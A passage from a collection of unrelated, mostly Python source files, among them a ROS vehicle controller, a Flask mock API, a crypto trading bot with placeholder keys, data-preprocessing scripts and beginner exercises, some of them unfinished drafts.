proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
else:
throttle = 0.
# decel = 0.5 # math.fabs( self.decel_limit )
# brake = ( self.vehicle_mass + self.fuel_capacity * GAS_DENSITY ) \
# * decel * self.wheel_radius
brake = 1. * self.max_brake * self.max_brake_value
self.last_cmd = [ throttle, brake ]
if log:
rospy.loginfo( "[twist_controller] == Dccr === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
steer = self.yaw_controller.get_steering( proposed_linear_v, proposed_angular_v, current_linear_v )
# if True:
# rospy.loginfo( "[twist_controller] throttle = %.2f, brake = %.2f, steer = %.2f", \
# throttle, brake, steer )
return throttle, brake, steer
|
'''
Interface to finds all the dependencies of package.
'''
import sys
import argparse
from depfinder.finder import find_deps, generate_requirements
def parse(args):
'''
Parses arguments using argparse
Parameters
----------
args: list of strings
argument options and values
Returns
---------
parsed_args: dict of strings
argument options are the keys and the accompanying
input are the values
'''
parser = argparse.ArgumentParser(description='Find and print to stdout'
+ ' all the dependencies of a'
+ ' package.')
parser.add_argument('-i', '--input', required=True,
help='Name of the query package.')
parsed_args = vars(parser.parse_args(args))
return parsed_args
if __name__ == '__main__':
args = parse(sys.argv[1:])
dependencies = find_deps(args['input'])
for req in generate_requirements(dependencies):
print(req)
|
"""
Write a python function, check_anagram() which accepts two strings and returns True, if one string is an anagram of another string. Otherwise returns False.
The two strings are considered to be an anagram if they contain repeating characters but none of the characters repeat at the same position. The length of the strings should be the same.
Also write the pytest test cases to test the program.
"""
#PF-Assgn-54
def check_anagram(data1,data2):
#start writing your code here
l1=[]
l2=[]
for i in data1.lower():
l1.append(i)
for i in data2.lower():
l2.append(i)
c=0
if len(data1)==len(data2):
for i in range(0,len(data1)):
if l1[i] in l2 and l1[i]!=l2[i]:
c=c+1
else:
return False
if len(data1)==c:
return True
else:
return False
print(check_anagram("About","table"))
|
# -*- coding: utf-8 -*-
from PIL import Image
from django.core.files import File
from selenium import webdriver
import datetime
import os
import tempfile
def make_screenshot(screenshot):
# get screenshot
driver = webdriver.Firefox()
driver.get(screenshot.url)
fd, filename = tempfile.mkstemp('.png')
os.close(fd)
driver.save_screenshot(filename)
driver.close()
# save title, saved date and image
screenshot.title = driver.title
screenshot.saved = datetime.datetime.now()
fileobj = File(open(filename))
screenshot.image.save(filename, fileobj)
# save thumbnail
fd2, thumbnail_filename = tempfile.mkstemp('.png')
os.close(fd2)
image = Image.open(filename)
cropped = image.crop((0, 0, 260*2, 180*2))
cropped.thumbnail((260, 180), Image.ANTIALIAS)
cropped.save(thumbnail_filename)
fileobj = File(open(thumbnail_filename))
screenshot.thumbnail.save(thumbnail_filename, fileobj)
|
#! /usr/bin/python3
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
import matplotlib.ticker as ticker
import sys
class Item:
#Item class constructor
def __init__(self,ID,name,key,log,host_name,units):
self.ID = ID
self.name = name
self.host_name = host_name
self.key = key
self.log = log
self.x = []
self.y = []
self.units = units
#Function which creates plots and saves them in tmp directory (changed in Report class)
def gen_graph(self):
self.log.append(2,'Generating {} graph'.format(self.name))
dates = mdates.date2num(self.x)
plt.figure(figsize=(20,5))
plt.plot_date(dates,self.y,'r')
plt.title(self.name)
option = sys.argv[1:]
option = option[0]
if option == '-d':
loc = mdates.HourLocator(interval=1)
fmt = mdates.DateFormatter('%H:%M')
label = 'Time [h:m]'
elif option == '-m':
loc = mdates.DayLocator(interval=1)
fmt = mdates.DateFormatter('%m.%d')
label = 'Day [m.d]'
elif option == '-w':
loc = mdates.DayLocator(interval=1)
fmt = mdates.DateFormatter('%d')
label = 'Day [m.d]'
plt.gca().xaxis.set_major_formatter(fmt)
plt.gca().xaxis.set_major_locator(loc)
plt.ticklabel_format(axis='y',style='plain')
plt.gca().yaxis.set_major_formatter(ticker.EngFormatter(unit=self.units))
plt.grid()
plt.xlabel(label)
if self.units == '':
plt.ylabel('[amount]')
plt.gca().yaxis.set_major_locator(ticker.MaxNLocator(integer=True))
else:
plt.ylabel('['+self.units+']')
plt.savefig(self.ID+'.jpg')
plt.close()
|
import lasagne
import numpy as np
from braindecode.veganlasagne.layers import transform_to_normal_net
def get_layers(layers_or_layer_obj):
"""Either return layers if already a list or call get_layers function
of layer object."""
if hasattr(layers_or_layer_obj, '__len__'):
return layers_or_layer_obj
else:
return layers_or_layer_obj.get_layers()
class JustReturn(object):
def __init__(self, layers):
self.layers = layers
def get_layers(self):
return get_layers(self.layers)
class TransformToNormalNet(object):
def __init__(self, layers):
self.layers = layers
def get_layers(self):
layers = get_layers(self.layers)
final_layer = layers[-1]
assert len(np.setdiff1d(layers,
lasagne.layers.get_all_layers(final_layer))) == 0, ("All layers "
"should be used, unused {:s}".format(str(np.setdiff1d(layers,
lasagne.layers.get_all_layers(final_layer)))))
transformed = transform_to_normal_net(final_layer)
return lasagne.layers.get_all_layers(transformed)
|
print ('DESAFIO 01')
nome = input ("Olá, qual o seu nome?")
print ('Seja bem vindo ', nome, '! Prazer em te conhecer!')
|
import json
from contextlib import closing
from urllib.error import URLError, HTTPError
from urllib.request import urlretrieve
from os.path import basename
from time import time
import requests
from urllib.parse import quote_plus as url_quote
from logging import getLogger
def _catch_err(req):
if not req.ok:
err = "Server responded with {}".format(req.status_code)
if req.headers.get("content-type").startswith("application/json"):
req_json = req.json()
if "message" in req_json.keys():
err = "Server responded with {}: {}".format(
req.status_code,
req_json["message"]
)
raise RuntimeError(err)
class ISISClient:
logger = getLogger("ISISClient")
# 64KiB
_DL_CHUNK_SIZE = 64000
def __init__(self, server_addr: str):
self._server_addr = server_addr
def _file_url(self, file_path):
file_path = url_quote(file_path)
return "/".join([self._server_addr, "files", file_path])
def _label_url(self, file_path):
return "/".join([self._file_url(file_path), "label"])
def program(self, command: str):
return ISISRequest(self._server_addr, command)
def download(self, remote_path, local_path):
return ISISClient.fetch(self._file_url(remote_path), local_path)
def delete(self, remote_path):
remote_url = self._file_url(remote_path)
ISISClient.logger.debug("Deleting {}...".format(remote_url))
r = requests.delete(remote_url)
_catch_err(r)
ISISClient.logger.debug("{} deleted successfully".format(remote_url))
def label(self, remote_path):
remote_url = self._label_url(remote_path)
ISISClient.logger.debug("Retrieving label for {}...".format(remote_url))
r = requests.get(remote_url)
_catch_err(r)
ISISClient.logger.debug("Label for {} retrieved successfully".format(remote_url))
return r.json()
@staticmethod
def fetch(remote_url, download_path):
ISISClient.logger.debug("Downloading {}...".format(remote_url))
start_time = time()
# urlretrieve can do both http & ftp
try:
urlretrieve(remote_url, download_path)
except HTTPError as e:
err_msg = "Server returned {}: {}".format(e.code, e.reason)
raise RuntimeError(err_msg)
except URLError as e:
err_msg = "Server returned '{}'".format(e.reason)
raise RuntimeError(err_msg)
log_msg = "{} downloaded to {} (took {:.1f}s)".format(
remote_url,
download_path,
time() - start_time
)
ISISClient.logger.debug(log_msg)
class ISISRequest:
def __init__(self, server_url: str, program: str):
self._server_url = server_url
self._program = program
self._args = dict()
self._files = dict()
self._remotes = list()
self._logger = getLogger(program)
def add_arg(self, arg_name, arg_value, is_remote=False):
self._args[arg_name] = arg_value
if is_remote:
self._remotes.append(arg_name)
return self
def add_file_arg(self, arg_name, file_path):
self._files[arg_name] = file_path
return self
def send(self):
self._logger.debug("Starting...")
start_time = time()
file_uploads = dict()
command_args = {**self._args}
for arg_name, file_path in self._files.items():
file_name = basename(file_path)
file_uploads[file_name] = open(self._files[arg_name], 'rb')
command_args[arg_name] = file_name
if len(file_uploads.keys()) > 0:
r = requests.post(
"/".join([self._server_url, "files"]),
files=file_uploads
)
_catch_err(r)
cmd_req = {
"program": self._program,
"args": command_args,
"remotes": self._remotes
}
r = requests.post(
"/".join([self._server_url, "isis"]),
json=cmd_req
)
try:
_catch_err(r)
except RuntimeError as e:
self._logger.error(json.dumps(cmd_req))
raise e
self._logger.debug("Took {:.1f}s".format(time() - start_time))
|
"""
A Schema is a more general container for Python objects.
In addition to tracking relationships between objects,
it can also keep other kind of indexing structures.
Will need a more flexible query object that can represent
comparisons.
NOTE -- not sure if this is really worth it since it only
kicks in with relatively large amounts of data.
At that point is it better off to use a SQLite anyway?
A M2M can be used to store a reverse mapping of
attribute : column values.
For something like "index foo.bar" followed by
"select foo where bar = 1" this is sufficient.
Range queries require an additional structure --
maybe ManyToMany that uses a SortedDict for one of its directions?
(SortedDict alone wouldn't be able to support fast deletes.)
What about indices over many or combinations?
This would basically be the same thing, with multiple values.
s
E.g. index of (a.b, a.c) is... just an M2M or M2MS of
{a: (a.b, a.c)}
"""
from . import relativity
class Schema(object):
def __init__(self, cols):
self.col_vals = {col: set() for col in cols}
# column label to set-of-values
self.rels = {}
# relationships among columns
self.col_users = {col: set() for col in cols}
# relationships / indices / etc that make use of cols
def add_col(self, col):
assert col not in self.col_vals
self.col_vals[col] = set()
self.col_users[col] = []
def remove_col(self, col):
assert col in self.col_vals
if self.col_users[col]:
raise ValueError('cannot remove {}, still in use by {}'.format(
col, self.col_users[col]))
def add(self, col, val):
self.col_vals[col].add(val)
def remove(self, col, val):
self.col_vals[col].remove(val)
class RelDB(object):
"""
RelDB = Schema + data
"""
def __init__(self, cols):
self.schema = Schema(cols)
self.col_vals = {col: set() for col in cols}
# column label to set-of-values
self.rels = {}
# relationships among columns
def add(self, col, val):
self.col_vals[col].add(val)
def remove(self, col, val):
self.col_vals[col].remove(val)
# TODO: pub-sub linking schema mutations to RelDB
def add_col(self, col):
"""
column labels aren't limited to strings -- any
hashable python object will do;
just keep in mind that if one column label is a tuple
of other column labels it will lead to ambiguous queries
"""
assert col not in self.col_vals
self.col_vals[col] = set()
self.col_users[col] = []
def remove_col(self, col):
assert col in self.col_vals
if self.col_users[col]:
raise ValueError('cannot remove {}, still in use by {}'.format(
col, self.col_users[col]))
def add_relationship(self, col_a, col_b):
"""
create an (initially empty) relationship between two columns
"""
assert col_a in self.col_vals
assert col_b in self.col_vals
self.rels[col_a, col_b] = fwd = M2M()
self.rels[col_b, col_a] = fwd.inv
def __getitem__(self, key):
if key in self.cols:
return self.col_vals[col]
if type(key) is tuple:
pass
if key is Ellipsis:
# iterate over all unique tuples in some order?
raise KeyError()
class View(object):
__slots__ = ('reldb', 'schema_ver')
"""
A View is a live attachement to some subset of the data
inside a RelDB; Views allow for more focused read/write APIs
"""
# this is only to provide isinstance() checks for users
class _RelView(View):
"""
View of a single relationship
This is basically an M2M.
"""
__slots__ = ('lhs_col', 'rhs_col')
def __init__(self, reldb, lhs_col, rhs_col):
assert lhs_col in reldb.cols
assert rhs_col in reldb.cols
self.lhs_col, self.rhs_col, self.reldb = lhs_col, rhs_col, reldb
self.schema_version = self.reldb.schema.ver
def add(self, key, val):
if key not in self.reldb.
# what is the structure of a Query?
# (M2M, [M2M, M2M], ..., M2M)
# tuple of M2Ms -- anything inside a list = not part of output
# multi layer sub-list = multiple paths
# a paths is something like (col, [col, col], ..., col)
class _Query(object):
"""
represents an abstract query; not intended to be instantied directly,
should be created by methods / getitem of DB
"""
__slots__ = ('cols', 'path', 'database', 'schema_version', 'grouped_by', 'sorted_on')
# cols - the columns that will be output (must be part of path)
# path - the join path through the DB that will be walked
# database - the RelDB over which the query will be evaluated
# schema_version - integer schema version
# grouped_by - subset of cols which will be combined into tuples as keys (?)
# -- an alternative interpretation of grouped_by is anything NOT grouped by must be aggregated,
# perhaps with an implicit / default aggregation being "build a list of"
# sorted_on - subset of cols that will be used to sort
def __init__(self, cols, path, database):
self.cols, self.path, self.database = cols, path, database
self.schema_version = database.schema.version
self.grouped_by = self.sorted_on = ()
def groupby(self, cols):
assert set(cols) < set(self.cols)
assert not set(cols) & set(self.grouped_by)
ret = _Query(self.cols, self.path, self.database)
ret.grouped_by += cols
return ret
def sort(self, cols):
assert set(cols) < set(self.cols)
assert not set(cols) & set(self.sorted_on)
ret = _Query(self.cols, self.path, self.database)
ret.sorted_on += cols
return ret
def validate(self, database):
assert set(self.cols) <= set(self.path)
class _ResultSet(object):
"""
a resultset obtained by executing a query; not intended to be constructed
directly should be built by a _Query
"""
__slots__ = ('query', 'results')
def __init__(self, query):
if query.database.schema.version != query.schema_version:
pass # re-validate that query is still valid
# evaluate the query against it's database
self.results = fetch() # ...
def __iter__(self):
return iter(self.results)
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.build_files.fmt.buildifier.rules import BuildifierRequest
from pants.backend.build_files.fmt.buildifier.rules import rules as buildifier_rules
from pants.backend.codegen.protobuf.target_types import rules as target_types_rules
from pants.core.goals.fmt import FmtResult
from pants.core.util_rules import external_tool
from pants.engine.fs import PathGlobs
from pants.engine.internals.native_engine import Snapshot
from pants.testutil.rule_runner import QueryRule, RuleRunner
class Materials:
def __init__(self, **kwargs):
pass
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*buildifier_rules(),
*external_tool.rules(),
*target_types_rules(),
QueryRule(FmtResult, [BuildifierRequest.Batch]),
],
# NB: Objects are easier to test with
objects={"materials": Materials},
)
GOOD_FILE = dedent(
"""\
materials(
drywall = 40,
status = "paid",
studs = 200,
)
"""
)
BAD_FILE = dedent(
"""\
materials(status='paid', studs=200, drywall=40)
"""
)
def run_buildifier(rule_runner: RuleRunner) -> FmtResult:
rule_runner.set_options(
["--backend-packages=pants.backend.build_files.fmt.buildifier"],
env_inherit={"PATH", "PYENV_ROOT"},
)
snapshot = rule_runner.request(Snapshot, [PathGlobs(["**/BUILD"])])
fmt_result = rule_runner.request(
FmtResult,
[
BuildifierRequest.Batch("", snapshot.files, partition_metadata=None, snapshot=snapshot),
],
)
return fmt_result
def test_passing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"BUILD": GOOD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot({"BUILD": GOOD_FILE})
assert fmt_result.did_change is False
def test_failing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"BUILD": BAD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot({"BUILD": GOOD_FILE})
assert fmt_result.did_change is True
def test_multiple_files(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"good/BUILD": GOOD_FILE, "bad/BUILD": BAD_FILE})
fmt_result = run_buildifier(rule_runner)
assert fmt_result.output == rule_runner.make_snapshot(
{"good/BUILD": GOOD_FILE, "bad/BUILD": GOOD_FILE}
)
assert fmt_result.did_change is True
|
SomaIdade = 0
MaisVelho = 0
ContMulher = 0
for c in range(1,5):
print(5*'-' + ' {}ª PESSOA' .format(c) + 5*'-')
Nome = str(input('Nome: '))
Idade = int(input('Idade: '))
Sexo = str(input('Sexo [M/F]: ')).upper().strip()
print(Sexo)
SomaIdade += Idade
if Sexo == 'M':
if MaisVelho < Idade:
MaisVelho = Idade
NomeVelho = Nome
if Sexo == 'F' and Idade < 20:
ContMulher += 1
print('A média de idade do grupo é {} '.format(SomaIdade/4))
print('O homem mais velho tem {} anos e se chama {}'.format(MaisVelho, NomeVelho))
print('Ao todo são {} mulheres com menos de 20 anos'.format(ContMulher))
|
import time
import pyupbit
import datetime
import requests
access = "your-access"
secret = "your-secret"
myToken = "slack-token"
def post_message(token, channel, text):
"""슬랙 메시지 전송"""
response = requests.post("https://slack.com/api/chat.postMessage",
headers={"Authorization": "Bearer "+token},
data={"channel": channel,"text": text}
)
def get_target_price(ticker, k):
"""변동성 돌파 전략으로 매수 목표가 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=2)
target_price = df.iloc[0]['close'] + (df.iloc[0]['high'] - df.iloc[0]['low']) * k
return target_price
def get_day_target(ticker, t):
"""Day Trading 전략으로 매수 목표가 설정"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=2)
day_target = df.iloc[0]['open'] * t
return day_target
def get_start_time(ticker):
"""시작 시간 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=1)
start_time = df.index[0]
return start_time
def get_ma(ticker):
"""15일 이동 평균선 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=15)
ma = df['close'].rolling(15).mean().iloc[-1]
return ma
def get_bbc(ticker):
"""20일 이동 평균선 조회"""
df = pyupbit.get_ohlcv(ticker, interval="day", count=20)
ma5 = df['close'].rolling(20).mean().iloc[-1]
def get_balance(coin):
"""잔고 조회"""
balances = upbit.get_balances()
for b in balances:
if b['currency'] == coin:
if b['balance'] is not None:
return float(b['balance'])
else:
return 0
def get_current_price(ticker):
"""현재가 조회"""
return pyupbit.get_orderbook(tickers=ticker)[0]["orderbook_units"][0]["ask_price"]
# 로그인
upbit = pyupbit.Upbit(access, secret)
print("autotrade start")
# 시작 메세지 슬랙 전송
post_message(myToken,"#crypto", "autotrade start")
while True:
try:
now = datetime.datetime.now()
start_time = get_start_time("KRW-XRP")
end_time = start_time + datetime.timedelta(days=1)
if start_time < now < end_time - datetime.timedelta(seconds=10):
target_price = get_target_price("KRW-XRP", 0.1)
ma5 = get_ma("KRW-XRP")
current_price = get_current_price("KRW-XRP")
if target_price < current_price and ma5 < current_price:
krw = get_balance("KRW")
if krw > 5000:
buy_result = upbit.buy_market_order("KRW-XRP", krw*0.9995)
post_message(myToken,"#crypto", "XRP buy : " +str(buy_result))
else:
xrp = get_balance("XRP")
day_price = get_day_target("KRW-XRP", 1.125)
if xrp > 1 or current_price == day_price:
sell_result = upbit.sell_market_order("KRW-XRP", xrp*0.995)
post_message(myToken,"#crypto", "XRP sell : " +str(sell_result))
time.sleep(1)
except Exception as e:
print(e)
post_message(myToken,"#crypto", e)
time.sleep(1)
|
from selenium import webdriver
class LoginPage():
# locate all the elements of page
textbox_username_id = "Email"
textbox_password_id = "Password"
button_login_xpath = "/html/body/div[6]/div/div/div/div/div[2]/div[1]/div/form/div[3]/input"
link_logout_linktext = "Logout"
def __init__(self,driver):
self.driver = driver
def setUserName(self,username):
self.driver.find_element_by_id(self.textbox_username_id).send_keys(username)
def setPassword(self,password):
self.driver.find_element_by_id(self.textbox_password_id).send_keys(password)
def clickLogin(self):
self.driver.find_element_by_xpath(self.button_login_xpath).click()
def clickLogout(self):
self.driver.find_element_by_linktext(self.link_logout_linktext).click()
|
UPDATE salary SET sex = CASE WHEN sex = 'm' THEN 'f' ELSE 'm' END;
|
'''Task 1. Проверить, что слово начинается и заканчивается
на одну и ту же букву.
[in]--> лол
[out]--> True
!!!
[in]---> c
[out]---> False (!!!!!!!!!)
'''
message = input('Введите что-то: ').strip().lower()
# храню передаваемое сообщение и убираю возможные пробелы
if len(message) > 1:
print(message[0] == message[-1])
else:
print('Введите больше одной буквы!')
|
from decouple import config, Csv
class Settings:
TELEGRAM_TOKEN = config('TELEGRAM_TOKEN', default='')
ADMIN_USERNAMES = config('ADMIN_USERNAMES', default='', cast=Csv())
SENTENCE_COMMAND = config('SENTENCE_COMMAND', default='sentence')
REMOVE_COMMAND = config('REMOVE_COMMAND', default='remove')
VERSION_COMMAND = config('VERSION_COMMAND', default='version')
FLUSH_COMMAND = config('FLUSH_COMMAND', default='flush')
DATABASE_URL = config('DATABASE_URL', default='sqlite:///:memory:')
MODEL_CACHE_TTL = config('MODEL_CACHE_TTL', default='300', cast=int)
COMMIT_HASH = config('HEROKU_SLUG_COMMIT', default='not set')
MESSAGE_LIMIT = config('MESSAGE_LIMIT', default='5000', cast=int)
MESSAGES_TABLE_NAME = config('MESSAGES_TABLE_NAME', default='messages')
LOG_LEVEL = config('LOG_LEVEL', default='INFO')
ADMIN_CHAT_ID = config('ADMIN_CHAT_ID', default='')
FILTERS = config('FILTERS', default='', cast=Csv())
settings = Settings()
|
/Users/daniel/anaconda/lib/python3.6/genericpath.py
|
import pandas as pd
import numpy as np
# Read the dataset into a data table using Pandas
df = pd.read_csv("ratings.csv", dtype={'userId': np.int32, 'movieId': np.int32, 'rating': np.uint8})
# Convert the running list of user ratings into a matrix using the 'pivot table' function
ratings_df = pd.pivot_table(df, index='userId', columns='movieId', aggfunc=np.max)
# Create a csv file of the data for easy viewing
ratings_df.to_csv("review_matrix.csv", na_rep="")
|
"""
2nd attempt: DP, learned from others
the idea is to divide the problem into subproblems:
for each amount, calculate the number of different combinations using the result from smaller amount
e.g.
dp[amount] = dp[amount] + dp[amount-coin]
dp[4] = 1 + dp[2]
it means 4 can be came up with 1111 and the dp[2](the combination of 2), which is 11 and 2
therefore
dp[4] = 1 + 2 = 3
see ./explanation.jpeg
Time O(N * A)
Space O(N)
192 ms, faster than 46.52%
"""
class Solution(object):
def change(self, amount, coins):
"""
:type amount: int
:type coins: List[int]
:rtype: int
"""
dp = (amount+1)*[0]
dp[0] = 1
for i in range(len(coins)):
coin = coins[i]
for j in range(1, amount+1):
if j - coin >= 0:
dp[j] += dp[j-coin]
return dp[amount]
|
import numpy as np
# シグモイド関数
# y = 1 / (1 + exp(-x))
# 不連続であるステップ関数を滑らかな関数に近似する。
def sigmoid(input):
return 1 / (1 + np.exp(-input))
|
import re
import difflib
import string
import pandas as pd
from datetime import datetime
from functools import wraps
from flask import Flask, request, jsonify
from jsonschema import validate, ValidationError, FormatChecker
from enlevement_vehicule import SCHEMA_ENLEVEMENT_VEHICULE
from entite_remettante import SCHEMA_ENTITE_REMETTANTE
from lieu_depot import SCHEMA_LIEU_DEPOT
from recuperation_bien import SCHEMA_RECUPERATION_BIEN
from remise_domaine import SCHEMA_REMISE_DOMAINE
from utils import random_string, HERMES_STATUT, extract_datetime
app = Flask(__name__)
def process_request(old_func):
@wraps(old_func)
def new_func(*args, **kwargs):
try:
raw_response = old_func(*args, **kwargs)
app.logger.info("Returning response: " + str(raw_response))
return jsonify(raw_response)
except ValidationError as e:
return jsonify({
"code": 400,
"message": "La requête transmise est incorrecte (voir section détail). Veuillez vérifier et soumettre à nouveau votre demande.",
"horodatage": datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
"detail": [{
"id": random_string(10, string.digits),
"errors": [{
"code": "Invalid json: " + e.message,
"message": re.sub('\n+', '\n', str(e))
}]
}]
}), 400
return new_func
def validate_body(schema: dict):
def decorator(old_func):
@wraps(old_func)
def new_func(*args, **kwargs):
request_data = request.json
app.logger.info("Receiving body: " + str(request_data))
validate(instance=request_data, schema=schema, format_checker=FormatChecker())
return old_func(request_data, *args, **kwargs)
return new_func
return decorator
@app.route('/hmsa/api/v1/referentiels/entitesremettantes', methods=['POST'])
@process_request
@validate_body(SCHEMA_ENTITE_REMETTANTE)
def entite_remettante(data):
return [{
"idCorrelation": entite['idCorrelation'],
"id": random_string(10, string.digits)
} for entite in data]
@app.route('/hmsa/api/v1/referentiels/lieux-de-depot', methods=['POST'])
@process_request
@validate_body(SCHEMA_LIEU_DEPOT)
def lieu_depot(data):
return [{
"idCorrelation": entite['idCorrelation'],
"id": random_string(10, string.digits)
} for entite in data]
@app.route('/hmsa/api/v1/vehicules', methods=['POST'])
@process_request
@validate_body(SCHEMA_REMISE_DOMAINE)
def remise_domaine(data):
new_bien = {
"id_correlation": data['idCorrelation'],
"id": int(random_string(10, string.digits))
}
dataframe = read_dataframe()
dataframe = dataframe.append(new_bien, ignore_index=True)
save_dataframe(dataframe)
return {
**new_bien,
"dateDemandePriseEnCharge": datetime.now().isoformat(),
}
@app.route('/hmsa/api/v1/vehicules/_search', methods=['POST'])
@process_request
@validate_body(SCHEMA_RECUPERATION_BIEN)
def recuperation_biens(data):
date_debut = extract_datetime(data['dateDebut'])
date_fin = extract_datetime(data['dateFin'])
df = read_dataframe()
df['dateMaj'] = pd.to_datetime(df['dateMaj'])
mask = (df['dateMaj'] > date_debut) & (df['dateMaj'] < date_fin)
df = df.loc[mask]
return [{
"idCorrelation": row['id_correlation'],
"id": row['id'],
"statut": row['statut'],
"dateReception": datetime.now().isoformat(),
"dateQualification": "2021-03-04",
"dateVente": "2021-03-04",
"datePaiement": "2021-03-04",
"raisonSocialeSociete": None,
"prenomClient": None,
"nomClient": None,
"prixFrappe": "1000.00",
} for _, row in df.iterrows()]
@app.route('/hmsa/api/v1/vehicules/<id_bien>/enlevement', methods=['PUT'])
@process_request
@validate_body(SCHEMA_ENLEVEMENT_VEHICULE)
def enlevement_vehicule(data, id_bien: str):
return ""
@app.route('/bien/<id_correlation_dossier>/update', methods=['GET'])
def update_bien(id_correlation_dossier: str):
new_statut = request.args.get('statut')
if new_statut not in HERMES_STATUT:
most_similar = ", ".join(difflib.get_close_matches(new_statut, HERMES_STATUT))
return f"Le statut n'a pas été reconnu. Les statuts les plus similaires sont : {most_similar}", 422
dataframe = read_dataframe()
row_with_same_id = dataframe['id_correlation'] == f"SIF{id_correlation_dossier}"
match_df = dataframe[row_with_same_id]
if match_df.shape[0] == 0:
return f"Le dossier avec pour id de corrélation {id_correlation_dossier} n'a pas été remis au domaine", 422
now = datetime.now().isoformat()
dataframe.loc[row_with_same_id, ['statut', 'dateMaj']] = new_statut, now
save_dataframe(dataframe)
return f"Le bien avec l'id {id_correlation_dossier} a été mis à jour à {now} avec le statut {new_statut}."
@app.route('/reset', methods=['GET'])
def reset():
dataframe = create_dataframe()
save_dataframe(dataframe)
return "Le bouchon a été réinitialisé"
def read_dataframe() -> pd.DataFrame:
try:
return pd.read_csv("static/biens.csv", header=0)
except FileNotFoundError:
create_dataframe()
def save_dataframe(df: pd.DataFrame):
df.to_csv("static/biens.csv", header=True, index=False)
def create_dataframe() -> pd.DataFrame:
return pd.DataFrame(columns=['id_correlation', 'id', 'statut', 'dateMaj'])
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 14 16:05:33 2018
@author: ck807
"""
import os, glob
import numpy as np
import pandas as pd
import cv2
i = 0
data_file = glob.glob('/local/data/chaitanya/landmarker/images/train/*.png')
files = []
data_file_label = glob.glob('/local/data/chaitanya/landmarker/txt/train/*.txt')
trainData = np.zeros((len(data_file),192, 192, 3))
trainLabel = np.zeros((len(data_file_label), 20))
print('Generating training set..')
for f in (data_file):
a=cv2.imread(f)
trainData[i,:,:,:] = a[:,:,:]
base = os.path.basename("/local/data/chaitanya/landmarker/images/train/" + f)
fileName = os.path.splitext(base)[0]
files.append(fileName)
i += 1
print('Generating training set labels..')
for k in (data_file_label):
base = os.path.basename("/local/data/chaitanya/landmarker/txt/train/" + k)
fileName = os.path.splitext(base)[0]
fileName = fileName + '_depth'
index = files.index(fileName)
txt_file = pd.read_csv(k)
txt_file = txt_file.as_matrix()
txt_file = txt_file.ravel()
trainLabel[index, :] = txt_file[:]
i = 0
data_file_val = glob.glob('/local/data/chaitanya/landmarker/images/val/*.png')
files_val = []
data_file_label_val = glob.glob('/local/data/chaitanya/landmarker/txt/val/*.txt')
valData = np.zeros((len(data_file_val),192, 192, 3))
valLabel = np.zeros((len(data_file_label_val), 20))
print('Generating validation set..')
for f in (data_file_val):
a=cv2.imread(f)
valData[i,:,:,:] = a[:,:,:]
base = os.path.basename("/local/data/chaitanya/landmarker/images/val/" + f)
fileName = os.path.splitext(base)[0]
files_val.append(fileName)
i += 1
print('Generating validation set labels..')
for k in (data_file_label_val):
base = os.path.basename("/local/data/chaitanya/landmarker/txt/val/" + k)
fileName = os.path.splitext(base)[0]
fileName = fileName + '_depth'
index = files_val.index(fileName)
txt_file = pd.read_csv(k)
txt_file = txt_file.as_matrix()
txt_file = txt_file.ravel()
valLabel[index, :] = txt_file[:,]
print('PreProcessing the data..')
trainData = trainData.astype('float32')
trainDataMean = np.mean(trainData)
trainDataStd = np.std(trainData)
trainData -= trainDataMean
trainData /= trainDataStd
trainLabel = trainLabel.astype('float32')
valData = valData.astype('float32')
valData -= trainDataMean
valData /= trainDataStd
valLabel = valLabel.astype('float32')
print('Saving as npy files..')
np.save('trainDataRegressor.npy',trainData)
np.save('trainLabelRegressor.npy', trainLabel)
np.save('valDataRegressor.npy',valData)
np.save('valLabelRegressor.npy', valLabel)
|
xs = []
ys = []
try:
while True:
x, y = map(float, input().split())
xs.append(x)
ys.append(y)
except:
pass
ans = []
for i in range (0,len(ys)):
div = 1
for j in range (0,len(xs)):
if i == j:
continue
div = div * (xs[i] - xs[j])
ans.append( ys[i] / div )
for i in range ( 0, len(ans) ):
print('a'+str(i)+':',ans[i])
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
import math
import numpy as np
import random
def check(sr, rbsc, chromosome):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
for i in range(n):
down_bandwidth = 0
up_bandwidth = 0
process = 0
for j in range(m):
down_bandwidth += chromosome[j][i] * sr[j][0]
up_bandwidth += chromosome[j][i] * sr[j][1]
process += chromosome[j][i] * sr[j][2]
if down_bandwidth <= rbsc[i][0] and up_bandwidth <= rbsc[i][1] and process <= rbsc[i][2]:
return True
else:
return False
# 那么一个个体应该用M * N的数组表示(要求:每一行只有一个1,每一列请求的资源不能超过基站剩余资源),所有数组应该有L*M*N大小的矩阵表示
def getInitialPopulation(sr, rbsc, populationSize):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
chromosomes_list = []
for i in range(populationSize):
# 随机产生一个染色体
chromosome = np.zeros((m, n), dtype=int)
rbsc_realtime = np.array(rbsc)
# 产生一个染色体矩阵中的其中一行
for j in range(m):
# 随机探查,基站数/2 次分配
flag = 0
for k in range(math.ceil(n / 2)):
bs_of_select = random.randint(0, n - 1)
if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] and sr[j][
2] < rbsc_realtime[bs_of_select][2]:
chromosome[j][bs_of_select] = 1
rbsc_realtime[bs_of_select][0] -= sr[j][0]
